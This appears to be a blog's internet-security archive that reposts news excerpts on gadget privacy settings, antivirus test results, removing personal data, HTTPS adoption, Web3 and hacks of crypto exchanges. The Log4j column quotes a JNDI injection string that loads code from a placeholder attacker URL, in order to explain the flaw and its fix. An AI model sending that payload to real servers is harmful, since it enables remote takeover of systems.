Category Archives: Internet Security

Unwrapped new gadgets? 10 ways to protect your privacy and security – USA TODAY

Kim Komando| Special to USA TODAY

Ah, a shiny new tech toy. In the eyes of a hacker, thats a great way into your homes network.

Most people dont realize how important it is to properly secure your internet connection and router from snoops, hackers, and moochers. Tap or click for five smart steps to keep hackers out of your home network and sensitive files.

You need to keep bad actors out of your devices too. Your phone contains a ton of personal information, and you need to do more than just setting up facial recognition or fingerprint scanning to lock it. Tap or click for important ways to lock down your new (or old) smartphone.

When it comes to the rest of your tech, its never too late to adjust your settings and get back just a little privacy. Lets dive in.

When you unwrap a new gadget, you're trying to get it up and running as quickly as possible. You might not usually spend much time poking around the settings. The security and privacy settings should be your first stop.

Chances are, your internet-connected gadgets are keeping track of your every move and that data gets packed up and sold. Start with your location data.

Keep in mind, disabling location services altogether may impact your device's ability to work the way you want it.

Heres how to turn off location settings on iPhone:

Go to Settings > Privacy > Location Services.

Here you can switch off location sharing or adjust access to only certain apps.

Adjust location settings on Android:

Swipe down from the top of your screen and tap Location.

If you dont see it in your pulldown menu, click the edit button and add it to your quick settings.

Note: Steps may differ depending on your Android model.

Your location is just one way advertisers and others track where you are and what interests you. Tap or click for hidden maps and trackers in your smartphone you can switch off.

Depending on how long your new device sat on a shelf or in a warehouse, it might need an update or two.

Again, pop into the settings and look for any software or firmware updates. You'll need to complete multiple updates from time to time, so make sure to knock them all out.

After that, my recommendation is to check each of your devices monthly. It only takes a few minutes, but it could save you a huge hassle down the line. Wherever you can, enable automatic updates, so you have one less thing to remember.

TRUE OR FALSE: Its OK to restart your computer by holding down the power button. Tap or click for my ruling.

Do you register your new tech with the manufacturer? It takes a few minutes, but it's a way to recoup your device if a hacker somehow takes it over. The manufacturer has proof the device is yours no matter what changes a hacker makes to it.

It's also an essential step if something breaks down the road and still under warranty.

Wi-Fi fix: How to improve a poor internet connection

A slow Wi-Fi connection is incredibly frustrating. But here are some easy things that can help get your computer or devices back up to speed.

ProblemSolved, USA TODAY

What's the first thing you do after setting up a new device? Usually, you'll connect it to your home's wireless internet.

Unfortunately, every connected device is a potential way in for bad actors. By creating a separate guest network for all your smart home gadgets and IoT devices, youll protect your main network.

Heres how to get started:

Open your routers admin page and look for a section labeled Guest Network or Guest Networks.

Enable your Guest Network and make sure SSID Broadcast is turned on.

To get to your router admin page, youll need the devices IP address and admin password. Tap or click here for a list of default passwords for 548 router brands then be sure to change yours.

Once youre in your routers settings, dont click any options that say something like: Allow guests to see each other and access my local network.

RELATED: Its easy to lose track of whats connected to your Wi-Fi. Worried you forgot something? Tap or click here for steps to see all the devices connected to your network.

Once you get your tech set up, make sure to set a strong, unique password for the associated account. Never stick with the default, even if it appears random.

When I say "strong" and "unique," I'm not talking about your kid's birthday or your pet's name. Randomly generated strings of letters, numbers and characters are best, but they are impossible to remember. Use a password manager or even a notebook to write your passwords down.

I like this password book on Amazon thats under $10.

When you swipe your credit card and enter your ZIP code, thats an example of two-factor authentication. Basically, youre providing an extra bit of proof that you are who you say you are.

You'll generally receive a text message or email with a code from the website or service you're trying to access. Tap or click here to set up two-factor authentication on your social media accounts.

If you're security conscious, you can skip the text or email codes altogether. Google Authenticator is an app that generates random codes for your accounts and no one can intercept those like they could a text. Tap or click here for more info and options other than Google.

If you bought a new smartphone or tablet, take a moment to add your emergency contacts. Its not just a good idea it can potentially save your life.

When you add emergency contacts to your phone, the best way to make them stand out from your other contacts is to set them as Favorites. Youll have them on speed dial for whenever you need them most.

On an iPhone, select a contact, scroll down and tap Add to Favorites.

On Android, open the Contacts app, and tap the contact you want to add to your favorites. At the top, tap Favorite.

Got a new phone? 9 safety apps you'll want on hand in an emergency

How to stop Amazon Fire, Sony, Vizio smart TVs from spying on you

Smart TVs have settings for adjusting your preferences. You can take control and tell the TV manufacturers not to sell your data.

USA TODAY

Did you unwrap a new TV? Most smart TVs use ACR, or Automatic Content Recognition. ACR scans the programs you watch and sends the data back to analytics services and marketing firms. Then, your data is crunched and studied so they can advertise to you based on your habits.

This is annoying and intrusive, but ACR does have an upside: It makes smart TVs cheaper.

Even better, you can turn the feature off altogether. The steps will be different for every brand.

Tap or click here to find out how to disable ACR on your smart TV.

Smart speakers are always listening for a wake word. You can review and delete your recordings. You can also opt out of having your data saved and recorded.

If youre concerned about privacy on your new Echo, tap or click here for 10 must-do security steps. This is definitely something you should do.

Smart speakers arent the only gadgets listening to you. Tap or click to stop the other big offenders.

Much like smart TVs, streaming devices keep tabs on what you watch. Fortunately, you can turn this off no matter which brand you use.

Roku:

From the Roku main menu, open Settings.

Open Privacy. Then click Advertising.

Check Limit ad tracking.

Apple TV:

Open Settings from the main menu. Then, choose General.

Choose Privacy, then toggle the Limit Ad Tracking option to On.

Amazon Fire Sticks:

From the Fire TV main menu, choose Settings.

Click Preferences, followed by Privacy Settings.

In the menu that opens, turn Device Usage Data, Collect App Data Usage, and Interest-based Ads off.

Bonus Tip: Essential tech cleanups to do before 2022

Is your digital life in need of a little TLC? Listen to the podcast to learn a few cleaning secrets, along with simple methods of sorting the clutter, clearing out junk and freeing up space on your devices. Looks like you just found your new holiday project.

Check out my podcast Kim Komando Explains on Apple, Google Podcasts, or your favorite podcast player.

Listen to the podcast here or wherever you get your podcasts. Just search for my last name, Komando.

Learn about all the latest technology on theKim Komando Show, the nation's largest weekend radio talk show. Kim takes calls and dispenses advice on today's digital lifestyle, from smartphones and tablets to online privacy and data hacks. For her daily tips, free newsletters and more, visit her website atKomando.com.

The views and opinions expressed in this column are the authors and do not necessarily reflect those of USA TODAY.

Here is the original post:
Unwrapped new gadgets? 10 ways to protect your privacy and security - USA TODAY

AV-Comparatives Reveals Results of Long-Term Tests of 19 Leading Endpoint Security Solutions – PRNewswire

The Business Security Test is the most comprehensive investigation of corporate endpoint security solutions on the market. To be named as an Approved Business Product, antivirus solutions must achieve a 90% score on the Malware Protection Test, with zero false alarms, and 90% in the Real-World Protection Test, with less than one hundred false alarms.

To earn AV-Comparative's certification, tested products must also be free of major performance issues, with an impact score below 40, and fix all reported bugs.

The 19 solutions which were recognised with an Approved Business Product Award are: Acronis, Avast, Bitdefender, Cisco, CrowdStrike, Cybereason, Elastic, ESET, FireEye, Fortinet, G Data, K7, Kaspersky, Malwarebytes, Microsoft, Panda, Sophos, VIPRE and VMware.

Peter Stelzhammer, Co-Founder of AV-Comparatives, said: "We congratulate the vendors whose products have qualified for an Approved Business Product Award. AV-Comparatives is fully independent and provides an unparalleled assessment of the antivirus products available on the market."

"In times of home offices and targeted attacks, protection against cyber crime is becoming increasingly important. Businesses looking for antivirus and endpoint security solutions should regard our test as a guide to the best products on the market. The threat landscape is constantly changing, so it is important to understand the performance of solutions that exist to keep organisations safe from external threats."

The latest Business Main-Test contains the results of the Business Real-World Protection Test conducted between August and November, as well as the Business Malware Protection Test in September, Business Performance Test from November. It also incorporates Product Reviews.

Here are details of the AV-Comparatives tests:

Real-World Protection Test: This mimics online malware attacks that a typical business user might encounter when surfing the internet.

Malware Protection Test: This assessment considers a scenario in which the malware pre-exists on the disk or enters the test system via a local area network or removable device, rather than directly from the internet.

Performance Test: An examination of the impact each product has on the system's performance, such as how much it slows down normal use of the PC while performing tasks.

A False Positives Test is also conducted to discover if the product incorrectly identifies legitimate software as harmful.

Each product that was involved in the test was also reviewed. Some are suitable for small businesses, whilst others are designed for large enterprises.

Like all AV-Comparatives' public test reports, the Enterprise and Business Endpoint Security Report is available to everyone for free: https://www.av-comparatives.org/tests/business-security-test-2021-august-november/#management-summary

About AV-Comparatives: AV-Comparatives is an independent organisation offering systematic testing to examine the efficacy of security software products and mobile security solutions. Using one of the largest sample collection systems worldwide, it has created a real-world environment for truly accurate testing.

AV-Comparatives offers freely accessible av-test results to individuals, news organisations and scientific institutions. Certification by AV-Comparatives provides a globally recognised official seal of approval for software performance.

Media Contact: Peter Stelzhammerphone: +43 720115542e-mail: [emailprotected]

SOURCE AV-Comparatives

Go here to see the original:
AV-Comparatives Reveals Results of Long-Term Tests of 19 Leading Endpoint Security Solutions - PRNewswire

Remove all your personal info from the internet: 6 steps to disappear for good – CNET

Finally ready to get off the grid? It's not quite as simple as it should be.

If you're reading this, it's likely your personal information is available to the public. And by "public" I mean everyone everywhere. The start of a new year is a good time to get your internet privacy ducks in a row and effectively "delete" yourself from the internet. But how can deleting yourself from the internet stop companies from getting hold of your info? Short answer: It can't.

Unfortunately, you can never completely remove yourself from the internet, but there are ways to minimize your digital footprint, which would lower the chances of your personal data being out there. Be forewarned, however: Removing your information from the internet, as I've outlined below, could adversely affect your ability to communicate with potential employers. Still interested? Here are some ways to disappear your digital self.

Think about which networks you have social media profiles on. Aside from the big ones(Facebook, Instagram, Twitter, LinkedIn), do you still have old accounts on sites like Tumblr? MySpace? What about your Reddit account? Which shopping sites have you registered on? Common ones might include information stored on Amazon, Gap.com, Macys.com and others.

Receive expert tips on using phones, computers, smart home gear and more. Delivered Tuesdays and Thursdays.

Using a service like DeleteMe can make removing yourself from the internet less of a headache.

To get rid of these accounts, go to your account settings and look for an option to either deactivate, remove or close your account. Depending on the account, you may find it under Privacy or Security, or something similar.

If you're having trouble with a particular online account, try searching online for "How to delete," followed by the name of the account you wish to delete. You should be able to find some instructions on how to delete that particular account. (Here's how to permanently delete your Facebook account without losing your photos.)

If for some reason there are any undeletable accounts, change the info in the account to something other than your actual info. Something fake or completely random.

Read more:Best VPN service of 2021

Now playing: Watch this: Get off the grid

3:43

There are companies out there that collect your information. They're called data brokers, and they have names like Spokeo, Whitepages.com and PeopleFinder, as well as plenty of others. They collect data from everything you do online and then sell that data to interested parties, mostly in order to more specifically advertise to you and sell stuff.

Now you could search for yourself on these sites and then deal with each site individually to get your name removed. Problem is, the procedure for opting out from each site is different and sometimes involves sending faxes and filling out actual physical paperwork. Physical. Paperwork. What year is this, again?

Anyway, an easier way to do it is to use a service like DeleteMe atjoindeleteme.com.For just $129 per year, the service will jump through all those monotonous hoops for you. It'll even check back every few months to make sure your name hasn't been re-added to these sites.

Be warned: If you remove yourself from these data broker sites, you'll also mostly remove yourself from Google search results, therefore making it much harder for people to find you. DeleteMe also gives you a set of DIY guides on how to remove yourself from each individual data broker if you'd like to do the process yourself.

First, check with your phone company or cell provider to make sure you aren't listed online and have them remove your name if you are.

If you want to remove an old forum post or an old embarrassing blog you wrote back in the day, you'll have to contact the webmaster of those sites individually. You can either look at the About us or Contacts section of the site to find the right person to contact or go to http://www.whois.com and search for the domain name you wish to contact. There you should find information on who exactly to contact.

Unfortunately, private website operators are under no obligation to remove your posts. So, when contacting these sites be polite and clearly state why you want the post removed. Hopefully they'll actually follow through and remove it.

If they don't, tip No. 4 is a less effective, but viable option.

If someone's posted sensitive information of yours such as a Social Security number or a bank account number and the webmaster of the site where it was posted won't remove it, you can send a legal removal request to Google to have it removed.

You may have to exercise Google's legal powers to get your personal information removed from a stubborn site.

The removal process could take some time, and there's no guarantee it'll be successful, but it's also your best recourse if you find yourself in this vulnerable situation.

Google's URL removal tool is handy for erasing evidence of past mistakes from the internet.

Let's say there's a webpage with information about you on it you'd like to get rid of -- like your former employer's staff page, months after you've changed jobs. You reach out to get them to update the page. They do, but when you Google your name, the page still shows up in your search results -- even though your name isn't anywhere to be found when you click the link. This means the old version of the page is cached on Google's servers.

Here's where this tool comes in. Submit the URL to Google in hopes it'll update its servers, deleting the cached search result so you're no longer associated with the page. There's no guarantee Google will remove the cached info for reasons, but it's worth a try to exorcise as much of your online presence as possible from the internet.

Depending on the type of email account you have, the number of steps this will take will vary.

You'll have to sign into your account and find the option to delete or close the account. Some accounts will stay open for a certain amount of time if you want to reactivate them.

An email address is necessary to complete the previous steps, so make sure this one is your last.

Remember to be patient when going through this process, and don't expect to complete it in one day. You may also have to accept that there are some things you won't be able to permanently delete from the internet.

Read the original here:
Remove all your personal info from the internet: 6 steps to disappear for good - CNET

Log4j a catastrophic internet security flaw – Newspaper – DAWN.COM – DAWN.com

The information technology industry is facing a Covid-like situation in its security realm due to Log4j vulnerability. Fear is that international hackers are already active in exploiting the breach in security.

The US Department of Homeland Security is raising a severe alarm, urging federal agencies to swiftly erase the issue since its so easy to be exploited and telling those with public-facing networks to put up firewalls if they cant be sure. The impacted software is modest and sometimes undocumented.

Detected in a frequently used program called Log4j, the exploit lets internet-based attackers rapidly grab control of everything from industrial control systems to web servers and consumer devices. Simply detecting which computers utilise the utility is a challenge; it is sometimes concealed under layers of other applications.

According to some estimations, up to 3bn systems and 44pc of organisations could be potentially compromised by the Log4j issue.

Those readers who are IT specialists, might be wondering what is Log4j vulnerability? For them, the quick answer is, it is like the SAQL injection, a familiar vulnerability of the past. The code snippet (${jndi:ldap://[attacker_URL]}) might look familiar to software developers familiar with code injections.

Log4j is a Java library that is used for logging errors and other software activities. All an attacker has to do, to exploit the flaw, is strategically send a malicious code string that eventually gets logged by Log4j affected version. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.

According to some estimations, up to 3 billion systems and 44 per cent of organisations could be potentially compromised by the Log4j issue. Millions of attempts by hackers have been logged on numerous networks. If anything, its now achingly evident that Log4Shell will continue to wreak havoc across the internet for years to come.

While this is a high-severity vulnerability, it takes a very specific configuration to exploit. In case your organisation is affected, one quick fix could be to modify the Gradle or Maven configuration files to prevent the use of the affected version of Log4j library, while you look for a permanent fix. A comprehensive way to solve this issue is to upgrade to a corrected version of Log4J, above 2.16. The good news is that just like Covid, we will come out of it sooner, not later, as numerous teams of experts are working day and night to repair the issue.

The writer is an IT professional, trained in the USA

Published in Dawn, The Business and Finance Weekly, December 27th, 2021

Read more from the original source:
Log4j a catastrophic internet security flaw - Newspaper - DAWN.COM - DAWN.com

We Encrypted the Web: 2021 Year in Review – EFF

In 2010, EFF launched its campaign to encrypt the entire webthat is, move all websites from non-secure HTTP to the more secure HTTPS protocol. Over 10 years later, 2021 has brought us even closer to achieving that goal. With various measurement sources reporting over 90% of web traffic encrypted, 2021 saw major browsers deploy key features to put HTTPS first. Thanks to Lets Encrypt and EFFs own Certbot, HTTPS deployment has become ubiquitous on the web.

For more than 10 years, EFFs HTTPS Everywhere browser extension has provided a much-needed service to users: encrypting their browser communications with websites and making sure they benefit from the protection of HTTPS wherever possible. Since we started offering HTTPS Everywhere, the battle to encrypt the web has made leaps and bounds: what was once a challenging technical argument is now a mainstream standard offered on most web pages. Now HTTPS is truly just about everywhere, thanks to the work of organizations like Lets Encrypt. Were proud of EFFs own Certbot tool, which is Lets Encrypts software complement that helps web administrators automate HTTPS for free.The goal of HTTPS Everywhere was always to become redundant. That would mean wed achieved our larger goal: a world where HTTPS is so broadly available and accessible that users no longer need an extra browser extension to get it. Now that world is closer than ever, with mainstream browsers offering native support for an HTTPS-only mode.

In 2020, Firefox announced an HTTPS-only mode feature that all users can turn on, signaling that HTTPS adoption was substantial enough to implement such a feature. 2021 was the year the other major browsers followed suit, starting with Chrome introducing an HTTPS default for navigation when a user types in the name of a URL without specifying insecure HTTP or secure HTTPS. Then in June, Microsofts Edge announced an automatic HTTPS feature that users can opt into. Then later in July, Chrome announced their HTTPS-first mode, which attempts to automatically upgrade all pages to HTTPS or display a warning if HTTPS isnt available. Given Chromes dominant share of the browser market, this was a huge step forward in web security. Safari 15 also implemented a HTTPS-first mode in its browsers. However, it does not block insecure requests like in Firefox, Chrome, and Edge.

With these features rolled out, HTTPS is truly everywhere, accomplishing the long-standing goal to encrypt the web.

SSL/TLS libraries are heavily used in everyday critical components of our security infrastructure, like transportation of web traffic. These tools are primarily built in the C programming language. However, C has a long history of memory safety vulnerabilities. So the Internet Security Research Group has led the development of building an alternative to certain libraries like OpenSSL in the Rust language. Rust is a modern, memory-safe programming language and the TLS library built in Rust has been named Rustls. Rustls has also been integrated for support in popular networking command line utilities such as Curl. With Rustls, important tools that use TLS can gain memory safety and make networks ever more secure and less vulnerable.

Since 2015, EFFs Certbot tool has helped millions of web servers deploy HTTPS by making the certificate process free and easy. This year we significantly updated the user experience of Cerbots command-line output for clarity. We also translated parts of the website into Farsi in response to user requests, and now we have the Instructions Generator available in this language. We hope to add more languages in the future and make TLS deployment in websites even more accessible across the globe.

Even as we see positive movement by major browsersfrom the HTTPS-by-default victories above to ending insecure FTP support and even Chrome adopting a Root Store programwe are also watching the potential dangers to these gains. Encrypting the net means sustaining the wins and fighting for tighter controls across all devices and major services.

HTTPS is ubiquitous on the web in 2021, and this victory is the result of over a decade of work by EFF, our partners, and the supporters who have believed in the dream of encrypting the web every step of the way.

Thank you for your support in fighting for a safer and more secure internet.

This article is part of our Year in Review series. Read other articles about the fight for digital rights in 2021.

Read the original post:
We Encrypted the Web: 2021 Year in Review - EFF

The Global Secure Sockets Layer (SSL) Certification Market is expected to grow by $ 5.13 bn during 2021-2025, progressing at a CAGR of 21.30% during…

Global Secure Sockets Layer Certification Market 2021-2025 The analyst has been monitoring the secure sockets layer certification market and it is poised to grow by $ 5. 13 bn during 2021-2025, progressing at a CAGR of 21.

New York, Dec. 24, 2021 (GLOBE NEWSWIRE) -- Reportlinker.com announces the release of the report "Global Secure Sockets Layer (SSL) Certification Market 2021-2025" - https://www.reportlinker.com/p05251392/?utm_source=GNW 30% during the forecast period. Our report on the secure sockets layer certification market provides a holistic analysis, market size and forecast, trends, growth drivers, and challenges, as well as vendor analysis covering around 25 vendors.The report offers an up-to-date analysis regarding the current global market scenario, latest trends and drivers, and the overall market environment. The market is driven by the need to adhere to regulatory requirements and increasing awareness of end-users. In addition, the need to adhere to regulatory requirements is anticipated to boost the growth of the market as well.The secure sockets layer certification market analysis includes the product segment and geographic landscape.

The secure sockets layer certification market is segmented as below:By Product Domain validation Organizational validation Extended validation

By Geographical Landscape North America Europe APAC South America MEA

This study identifies the increasing number of data theftsas one of the prime reasons driving the secure sockets layer certification market growth during the next few years.

The analyst presents a detailed picture of the market by the way of study, synthesis, and summation of data from multiple sources by an analysis of key parameters. Our report on secure sockets layer certification market covers the following areas: Secure sockets layer certification market sizing Secure sockets layer certification market forecast Secure sockets layer certification market industry analysis

This robust vendor analysis is designed to help clients improve their market position, and in line with this, this report provides a detailed analysis of several leading secure sockets layer certification market vendors that include Aruba Spa, Asseco Poland S.A., Comodo Security Solutions Inc., DigiCert Inc., Entrust Datacard Corp., GlobalSign Ltd., GoDaddy Inc., HID Global Corp., Internet Security Research Group, and NortonLifeLock Inc. Also, the secure sockets layer certification market analysis report includes information on upcoming trends and challenges that will influence market growth. This is to help companies strategize and leverage all forthcoming growth opportunities.The study was conducted using an objective combination of primary and secondary information including inputs from key participants in the industry. The report contains a comprehensive market and vendor landscape in addition to an analysis of the key vendors.

The analyst presents a detailed picture of the market by the way of study, synthesis, and summation of data from multiple sources by an analysis of key parameters such as profit, pricing, competition, and promotions. It presents various market facets by identifying the key industry influencers. The data presented is comprehensive, reliable, and a result of extensive research - both primary and secondary. Technavios market research reports provide a complete competitive landscape and an in-depth vendor selection methodology and analysis using qualitative and quantitative research to forecast the accurate market growth.Read the full report: https://www.reportlinker.com/p05251392/?utm_source=GNW

About ReportlinkerReportLinker is an award-winning market research solution. Reportlinker finds and organizes the latest industry data so you get all the market research you need - instantly, in one place.

__________________________

Story continues

Here is the original post:
The Global Secure Sockets Layer (SSL) Certification Market is expected to grow by $ 5.13 bn during 2021-2025, progressing at a CAGR of 21.30% during...

What is Web3, is it the new phase of the Internet and why are Elon Musk and Jack Dorsey against it? – Euronews

Web3 has become the latest buzzword to get tech and cryptocurrency enthusiasts talking. While some are excited at what is being dubbed as the next phase of the Internet, others, including Elon Musk and Jack Dorsey, have voiced their concerns over it.

But what is Web3 and can this decentralised vision of the Internet work?

Put simply, Web3 is an umbrella term for an online ecosystem that cuts out the big middlemen on the Internet. So, platforms on Web3 are not owned by central gatekeepers and you wouldnt navigate the Internet through search engines such as Google.

It uses blockchain, the same system used by cryptocurrencies and non-fungible tokens (NFTs).

The first version of the world wide web was launched by Sir Tim Berners-Lee in 1989. Back then, the few people who had the knowledge to could put information online in a decentralised way.

Web 2.0 came some 10 years later and started with the development of tools that were easy to use, allowing anyone to upload content online via the tech giants such as Google, Twitter and Facebook (now Meta).

But these free tools supplied by the tech companies, that allowed everyone to become publishers, was also harvesting our personal data to be used for tailored advertisements and marketing campaigns.

In theory, Web3 will be a combination of the two earlier versions of the Internet but will take the power away from the tech giants and corporations and put it back into the peoples hands.

And instead of exchanging our data to upload content online, users can become participants and shareholders by earning tokens on the blockchain system, which will allow you to have a say over a network.

Web 2.0 is the transmission of information but Web3 is the transmission of values, said Pascal Gauthier, CEO of the crypto hardware wallet Ledger, one of Frances unicorns.

We can see that currently on the Internet, your experience becomes bad as soon as you have to take out your credit card, he told Euronews Next, adding, Web3 basically fixes issues such as payments.

How does it work?

In the Web3 world, search engines, marketplaces and social networks will have no overriding overlord.

So you can control your own data and have a single personalised account where you could flit from your emails to online shopping and social media, creating a public record of your activity on the blockchain system in the process.

A blockchain is a secure database that is operated by users collectively and can be searched by anyone. People are also rewarded with tokens for participating.

It comes in the form of a shared ledger that uses cryptography to secure information. This ledger takes the form of a series of records or blocks that are each added onto the previous block in the chain, hence the name.

Each block contains a timestamp, data, and a hash. This is a unique identifier for all the contents of the block, sort of like a digital fingerprint.

The idea of a decentralised Internet has been in the works for the last decade with the explosion of cryptocurrencies and blockchain, and there are arguably some early Web3 applications that already exist. But we are not officially in the Web3 world.

Is Web3 too idealistic?

The idea of a decentralised internet may sound far-fetched but big tech companies are already betting big on it and even assembling Web3 teams.

But even if power is taken away from the tech giants, the people currently shaping Web3 are software developers and venture investors. Meanwhile, blockchain networks are not equally distributed and are in the hands of venture capitalists and early adopters.

This week, the former Twitter CEO Jack Dorsey suggested that Web3 is under the control of the venture capital industry, particularly the firm Andreessen Horowitz, an early Facebook backer and a Web3 advocate.

You dont own Web3. The VCs and their LPs do. It will never escape their incentives. Its ultimately a centralized entity with a different label, the Squares CEO tweeted.

On Thursday, Dorsey tweeted in response that he had been blocked on Twitter by Marc Andreessen, co-founder of Andreessen Horowitz.

Meanwhile, Tesla chief Elon Musk says Web3 is more of a marketing buzzword than reality.

"Im not suggesting web3 is real seems more marketing buzzword than reality right now just wondering what the future will be like in 10, 20 or 30 years. 2051 sounds crazy futuristic," he wrote on Twitter.

Musk also asked where it was, to the annoyance of Web3 devotees.

What are the challenges?

Experts have expressed concerns over how to regulate a decentralised internet, which would make it even more difficult to prevent cybercrime, hate speech and misinformation.

Web3 can also be hard to use but Gauthier says the challenge is not if people can access it easily but if they know how to manage their data securely.

Anyone on the planet can access Bitcoin or Ethereum today, as long as you have an internet connection. So there are billions of human beings that can access Web3 systems while the same human beings cannot necessarily access the banking system, he said.

To understand how Web3 works, there are some mistakes you should be aware of and you have to pay attention to your safety.

Before, in the financial world, security was provided by your bank. All of a sudden, now, you have to do it yourself since you own the privileges and you can manage your money online. So that means that there is a whole education and understanding part of the security issues that are important.

Building the technology to make Web3 fully decentralised, which has never been done before, is also one of the challenges.

Creating decentralised tools is not easy. Centralised systems are easier to build but less transparent, said rsula OKuinghttons, director of public relations of the blockchain infrastructure company Parity Technologies, who also works with the Web3 Foundation.

Some blockchain hybrids are a combination of centralised and decentralised systems but creating 100 per cent decentralised tools is the hardest and the longest part. But this is what Web3 is truly about, she told Euronews Next.

Go here to see the original:
What is Web3, is it the new phase of the Internet and why are Elon Musk and Jack Dorsey against it? - Euronews

Covid, Online Professional Programmes; Here Are Top Trending Courses In 2021 – NDTV

2021 year-ender: Trending courses during the year

Image credit: Shutterstock

While the year 2021 saw disruptions in most of the academic courses due to the ongoing Covid pandemic, several online courses provided by Study Webs of Active Learning for Young Aspiring Minds (SWAYAM), Indian Institutes of Technology (IITs) and other institutions and platforms this year were trending. With colleges and universities holding classes remote, students have enrolled in online courses for their easy accessibility and easy course format.

Given the developments in the last five years and unprecedented Covid times, as per International Career and College Counseling (IC3) Institute Academic Head, Amrita Ghulati, there has been a definite surge in courses related to Artificial Intelligence, Machine learning, Cyber security, Data Science, Digital Marketing, Business Analytics, and Health care.

Particularly, interesting is the growth in courses in entrepreneurship and innovation across different levels of education, also being embedded in some well-established, traditional programs of study. Another noticeable trend is the bent towards more broad-based, inter and multidisciplinary courses T-shaped education with breadth across disciplines coupled with depth or specialization in one or two domains," IC3 Institute Academic Head added.

Also, the second wave of Covid which hit the country during the beginning of the year had led medical professionals and healthcare executives to delve into courses to learn what the virus is all about and how to approach patients who are affected.

With the year coming to an end, let us look at the emerging courses in 2021.

Academic Writing course is among one of the emerging SWAYAM certificate courses that aimed to bridge the gap by providing knowledge for effective and result-oriented academic writing. The course is a foundation-level course and the learning depends on how a learner does their research work on a specific area. Students can avail Academic Writing course in SWAYAM. The course duration is 15 weeks and the course is in line with the higher education regulator, University Grants Commissions pre-PhD courses work.

With the increase in the penetration of the internet and online activity, the scope of digital marketing has also increased. Digital marketing includes topics like content marketing, search engine optimization (SEO), social media and marketing analytics.

The course in Peace and Conflict Management is one of the Swayam online courses that seek to teach the concept of peace and the role of peace in human development. The course in Peace and Conflict Management also seeks to teach learners theories and types of conflict, methods of conflict management, and contemporary initiatives of peace.

The Blockchain courses are designed to help technical and non-technical learners with key concepts. Kerala Blockchain Academy, under the state-run Digital University Kerala, offered two free fundamental programs in Blockchain technology.

The Robotics course was also in trend in 2021. The course in Robotics is one of the SWAYAM free online courses offered by the Indian Institute of Science (IISc) Bangalore and is designed for PhD and Masters students in Electrical/ Mechanical engineer and Computer science. Students belonging to all disciplines of Engineering, Researchers and practicing Engineers can take courses in Robotics in SWAYAM. The Robotics course in SWAYAM platform is a eight-week course.

The course on Covid-19 Contract Tracing is for physicians, nurses, and other healthcare professionals. This course helps the learners to have a unified and evidence-based approach to saving the lives of patients affected by Covid.

With students and professionals working remote during 2021, many learners enrolled for courses on Languages. A study published in the journal Scientific Reports also found that learning foreign languages enhances the brain's elasticity and its ability to code information.

Data Science courses have been in the hype in 2021. Courses in Data Science will let a student help in analysing data or information from different sources and gain maximum insight. Data Science courses have been provided by the Indian Institutes of Technology (IITs) including in Delhi and Madras.

Introduced in 2020, IIT Madras BSc in Programming and Data Science, is the first-ever online degree programme offered by an IIT.

Digital transformation has truly led the way in 2021 and full-stack software and product engineering, cloud computing, data science, and other technologies have been the key enablers of actioning this transformation, Abhishek Arora, EVP and Business Head, Skills and Careers Business, NIIT Ltd said.

Adding that NIIT is in the process of developing free content for its learners and prospective learners and aims to deep-skill them so as to make them future ready, Mr Arora further added that: "With industry 4.0, there is a general tilt towards courses which focus on automation, Internet of Things, Artificial Intelligence amongst others and a learner equipped with these in-demand skills tends to have an edge amongst recruiters. Apart from enabling better job opportunities, they offer ample other advantages too such as edge over competition, equipped with knowledge on real-life projects etc."

Read this article:
Covid, Online Professional Programmes; Here Are Top Trending Courses In 2021 - NDTV

How to tackle cyber hacks on crypto exchanges – Legal Cheek

LSE law graduate Hui Ting Tan considers the case for reform

In the past year, there have been a spate of hacking attacks on cryptocurrency exchanges, which are exchanges which allow people to trade digital currencies such as Bitcoin and Ethereum. Last September, a hacker managed to take out $610 million (460 million) worth of customers coins from Poly Network, a Japanese cryptocurrency exchange.

Interestingly, the hacker returned all of the stolen assets, claiming that the hack was just an attempt to highlight the vulnerabilities in Poly Networks system. When the heist was discovered, Poly Network immediately published the addresses to which the digital assets had been transferred, and asked centralised crypto exchanges to stop all asset flows stemming from the specified addresses. Tether, a stablecoin operator immediately froze $33 million of the stolen assets, while other major exchanges such as Binance agreed to look into the matter. In the meantime, internet sleuths sprung quickly into action to piece together information about the hacker. A cyber security firm called Slowmist even claimed to have personal information relating to the hacker, such as the hackers IP address and email information.

Regardless of whether the hackers motivations can be taken at face value, what is evident is that identifying errors in the code of a crypto exchange is one thing, but actually laundering those ill-gotten gains into money in the real world is another. Due to the transparency of the blockchain technology upon which the cryptocurrencies are built, every transaction in the digital markets is publicly transparent on blockchains, and as proponents of De-Fi (decentralised finance) like to argue, this creates a crowdsourced imitation of a self-regulating banking system.

What are the inherent or systemic problems with having a self-regulatory banking system however? For one, how do you draw the line between an ethical white hat hacker, who is just exploiting a bug in the system, and a self-interested criminal? There is of course an argument distinctive to the De-Fi and blockchain context. The unique strength of an open-sourced technological system is that improvements to the system itself are built upon community improvements and ingenuity. On the other hand, what is clear is that ethical hacking cannot be without scope. No ethical hacker would risk the assets or data of thousands of users. One might imagine that if every firm that were a victim of a hack were to legitimise these actions by labelling these acts as whitehats, then ethical hacking would be devoid of any meaning.

What I find more concerning is the notion that criminality and the commensurate level of punishment can be outsourced to a private company, like Poly Network. Hypothetically, imagine if a group of armed robbers organised a traditional bank heist, and was able to steal a significant sum of money, which it eventually returned, although it had broken numerous criminal laws along the way, such as criminal trespass, common assault, and other public crimes. Lets imagine as well that the bank is unable to print or obtain more money, and was thus compelled to offer the robbers criminal immunity and a monetary reward if the money was returned. That the money eventually came to no harm is irrelevant, it would even be irrelevant if the armed robbers were not eventually found to be guilty of those accompanying crimes. In my opinion, what is problematic is the idea that a private company is able to arbitrarily dictate the criminality of a hack, or to even whitewash a criminal hack for commercial reasons.

Want to write for the Legal Cheek Journal?

Things havent ended on a sour note because the assets have been returned, but shouldnt it be time to consider the implications if a similar situation were to happen again? What happens then if a significant number of consumers of a hugely popular crypto-asset exchange were to lose their life savings through the brilliance of an unscrupulous hacker? What are the legal protections available to consumers, and how robust is the regulatory and compliance regime in place to prevent crypto-assets from being laundered?

From a consumer protection perspective, there are unsurprisingly no guarantees of reimbursement in a largely unregulated sector. In fact, a haircut has become a term used to describe partial compensation in the wake of a cyber-attack. For example, in the wake of a hack on Bitfinex () in August 2016, which caused a loss of 120,000 Bitcoin, worth around $75 million at the time, its users faced a 36% haircut regardless of whether they held any Bitcoin.

